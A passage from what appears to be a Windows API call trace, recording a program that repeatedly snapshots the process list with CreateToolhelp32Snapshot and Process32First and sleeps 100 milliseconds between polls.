th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0098.878] Sleep (dwMilliseconds=0x64) [0099.029] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a5c [0099.042] Process32First (in: hSnapshot=0x1a5c, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0099.130] Sleep (dwMilliseconds=0x64) [0099.327] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20e4 [0099.340] Process32First (in: hSnapshot=0x20e4, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0099.443] Sleep (dwMilliseconds=0x64) [0099.543] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a5c [0099.556] Process32First (in: hSnapshot=0x1a5c, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0099.736] Sleep (dwMilliseconds=0x64) [0099.836] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a78 [0099.848] Process32First (in: hSnapshot=0x1a78, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0099.922] Sleep (dwMilliseconds=0x64) [0100.037] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1e38 [0100.151] Process32First (in: hSnapshot=0x1e38, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0100.317] Sleep (dwMilliseconds=0x64) [0100.578] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1e38 [0100.698] Process32First (in: hSnapshot=0x1e38, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0100.770] Sleep (dwMilliseconds=0x64) [0100.913] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1244 [0100.925] Process32First (in: hSnapshot=0x1244, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0101.013] Sleep (dwMilliseconds=0x64) [0101.171] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2008 [0101.183] Process32First (in: hSnapshot=0x2008, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0101.301] Sleep (dwMilliseconds=0x64) [0101.476] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10d8 [0101.497] Process32First (in: hSnapshot=0x10d8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0101.605] Sleep (dwMilliseconds=0x64) [0101.735] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2078 [0101.748] Process32First (in: hSnapshot=0x2078, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0101.847] Sleep (dwMilliseconds=0x64) [0102.003] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10d8 [0102.019] Process32First (in: hSnapshot=0x10d8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0102.102] Sleep (dwMilliseconds=0x64) [0102.203] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20ac [0102.220] Process32First (in: hSnapshot=0x20ac, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0102.299] Sleep (dwMilliseconds=0x64) [0102.499] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a5c [0102.511] Process32First (in: hSnapshot=0x1a5c, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0102.591] Sleep (dwMilliseconds=0x64) [0102.743] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1974 [0102.757] Process32First (in: hSnapshot=0x1974, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0102.858] Sleep (dwMilliseconds=0x64) [0102.960] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1e5c [0102.972] Process32First (in: hSnapshot=0x1e5c, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0103.053] Sleep (dwMilliseconds=0x64) [0103.158] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a78 [0103.170] Process32First (in: hSnapshot=0x1a78, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0103.239] Sleep (dwMilliseconds=0x64) [0103.367] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1fbc [0103.399] Process32First (in: hSnapshot=0x1fbc, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0103.495] Sleep (dwMilliseconds=0x64) [0103.685] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2060 [0103.697] Process32First (in: hSnapshot=0x2060, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0103.769] Sleep (dwMilliseconds=0x64) [0103.912] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a78 [0103.926] Process32First (in: hSnapshot=0x1a78, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0104.000] Sleep (dwMilliseconds=0x64) [0104.101] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1abc [0104.113] Process32First (in: hSnapshot=0x1abc, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0104.194] Sleep (dwMilliseconds=0x64) [0104.337] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1fd4 [0104.354] Process32First (in: hSnapshot=0x1fd4, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0104.467] Sleep (dwMilliseconds=0x64) [0104.658] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1e64 [0104.671] Process32First (in: hSnapshot=0x1e64, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0104.770] Sleep (dwMilliseconds=0x64) [0104.871] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1fd4 [0104.883] Process32First (in: hSnapshot=0x1fd4, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0104.962] Sleep (dwMilliseconds=0x64) [0105.063] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1e64 [0105.078] Process32First (in: hSnapshot=0x1e64, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0105.355] Sleep (dwMilliseconds=0x64) [0105.513] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1fdc [0105.525] Process32First (in: hSnapshot=0x1fdc, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0105.671] Sleep (dwMilliseconds=0x64) [0105.804] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2300 [0105.822] Process32First (in: hSnapshot=0x2300, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0105.896] Sleep (dwMilliseconds=0x64) [0106.006] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1df0 [0106.018] Process32First (in: hSnapshot=0x1df0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0106.111] Sleep (dwMilliseconds=0x64) [0106.288] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1df0 [0106.301] Process32First (in: hSnapshot=0x1df0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0106.559] Sleep (dwMilliseconds=0x64) [0106.659] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x23d4 [0106.672] Process32First (in: hSnapshot=0x23d4, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0106.817] Sleep (dwMilliseconds=0x64) [0106.918] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0106.930] Process32First (in: hSnapshot=0x1a2c, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0107.114] Sleep (dwMilliseconds=0x64) [0107.266] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d5c [0107.289] Process32First (in: hSnapshot=0x1d5c, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0107.423] Sleep (dwMilliseconds=0x64) [0107.544] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0107.556] Process32First (in: hSnapshot=0x1a2c, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0107.643] Sleep (dwMilliseconds=0x64) [0107.744] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1da4 [0107.756] Process32First (in: hSnapshot=0x1da4, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0107.916] Sleep (dwMilliseconds=0x64) [0108.094] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1da4 [0108.105] Process32First (in: hSnapshot=0x1da4, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0108.205] Sleep (dwMilliseconds=0x64) [0108.306] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2300 [0108.318] Process32First (in: hSnapshot=0x2300, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0108.515] Sleep (dwMilliseconds=0x64) [0108.653] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a0c [0108.664] Process32First (in: hSnapshot=0x1a0c, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0108.732] Sleep (dwMilliseconds=0x64) [0108.843] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1db4 [0108.854] Process32First (in: hSnapshot=0x1db4, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0108.953] Sleep (dwMilliseconds=0x64) [0109.105] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d94 [0109.117] Process32First (in: hSnapshot=0x1d94, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0109.230] Sleep (dwMilliseconds=0x64) [0109.333] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d9c [0109.344] Process32First (in: hSnapshot=0x1d9c, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0109.499] Sleep (dwMilliseconds=0x64) [0109.600] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1dac [0109.611] Process32First (in: hSnapshot=0x1dac, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0109.679] Sleep (dwMilliseconds=0x64) [0109.824] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1fe4 [0109.858] Process32First (in: hSnapshot=0x1fe4, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0109.926] Sleep (dwMilliseconds=0x64) [0110.030] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d9c [0110.043] Process32First (in: hSnapshot=0x1d9c, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0110.348] Sleep (dwMilliseconds=0x64) [0110.513] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d54 [0110.526] Process32First (in: hSnapshot=0x1d54, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0110.710] Sleep (dwMilliseconds=0x64) [0110.856] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d74 [0110.868] Process32First (in: hSnapshot=0x1d74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0110.993] Sleep (dwMilliseconds=0x64) [0111.094] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1fe4 [0111.105] Process32First (in: hSnapshot=0x1fe4, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0111.174] Sleep (dwMilliseconds=0x64) [0111.301] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d74 [0111.313] Process32First (in: hSnapshot=0x1d74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0111.590] Sleep (dwMilliseconds=0x64) [0111.692] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d9c [0111.706] Process32First (in: hSnapshot=0x1d9c, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0111.810] Sleep (dwMilliseconds=0x64) [0111.951] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19d8 [0111.964] Process32First (in: hSnapshot=0x19d8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0112.065] Sleep (dwMilliseconds=0x64) [0112.197] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2300 [0112.208] Process32First (in: hSnapshot=0x2300, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0112.319] Sleep (dwMilliseconds=0x64) [0112.497] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19dc [0112.509] Process32First (in: hSnapshot=0x19dc, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0112.578] Sleep (dwMilliseconds=0x64) [0112.702] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d44 [0112.714] Process32First (in: hSnapshot=0x1d44, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0112.870] Sleep (dwMilliseconds=0x64) [0112.971] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d84 [0112.990] Process32First (in: hSnapshot=0x1d84, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0113.172] Sleep (dwMilliseconds=0x64) [0113.348] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19d0 [0113.361] Process32First (in: hSnapshot=0x19d0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0113.483] Sleep (dwMilliseconds=0x64) [0113.583] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d14 [0113.596] Process32First (in: hSnapshot=0x1d14, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0113.675] Sleep (dwMilliseconds=0x64) [0113.783] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d78 [0113.795] Process32First (in: hSnapshot=0x1d78, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0113.863] Sleep (dwMilliseconds=0x64) [0113.963] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19fc [0113.975] Process32First (in: hSnapshot=0x19fc, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0114.052] Sleep (dwMilliseconds=0x64) [0114.220] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x191c [0114.232] Process32First (in: hSnapshot=0x191c, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0114.339] Sleep (dwMilliseconds=0x64) [0114.439] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d78 [0114.453] Process32First (in: hSnapshot=0x1d78, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0114.533] Sleep (dwMilliseconds=0x64) [0114.633] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1da8 [0114.646] Process32First (in: hSnapshot=0x1da8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, 